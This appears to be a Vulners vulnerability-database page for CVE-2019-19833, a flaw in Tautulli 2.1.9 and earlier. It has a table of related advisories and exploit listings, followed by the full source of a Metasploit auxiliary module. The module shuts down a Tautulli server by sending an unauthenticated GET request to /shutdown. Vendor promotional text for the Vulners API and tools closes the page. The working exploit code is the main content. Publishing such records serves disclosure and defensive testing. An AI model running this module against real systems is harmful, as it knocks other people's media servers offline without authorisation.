| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Tautulli 2.1.9 - Denial of Service Exploit | 16 Jan 202000:00 | – | zdt | |
| Exploit for Cross-Site Request Forgery (CSRF) in Tautulli | 1 Jan 202600:39 | – | githubexploit | |
| CVE-2019-19833 | 19 Mar 202016:50 | – | circl | |
| Tautulli Cross-Site Request Forgery Vulnerability | 18 Dec 201900:00 | – | cnvd | |
| CVE-2019-19833 | 18 Dec 201917:08 | – | cve | |
| CVE-2019-19833 | 18 Dec 201917:08 | – | cvelist | |
| Tautulli 2.1.9 - Denial of Service ( Metasploit ) | 16 Jan 202000:00 | – | exploitpack | |
| Tautulli v2.1.9 - Shutdown Denial of Service | 17 Jan 202010:57 | – | metasploit | |
| CVE-2019-19833 | 18 Dec 201918:15 | – | nvd | |
| Tautulli 2.1.9 Cross Site Request Forgery | 17 Dec 201900:00 | – | packetstorm |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service',
'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
'Author' => 'Ismail Tasdelen',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-19833'],
['EDB', '47785']
]
)
register_options([ Opt::RPORT(8181) ])
end
def run
res = send_request_raw({
'method' => 'GET',
'uri' => '/shutdown'
})
if res
print_status("Request sent to #{rhost}")
else
print_status("No reply from #{rhost}")
end
rescue Errno::ECONNRESET
print_status('Connection reset')
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation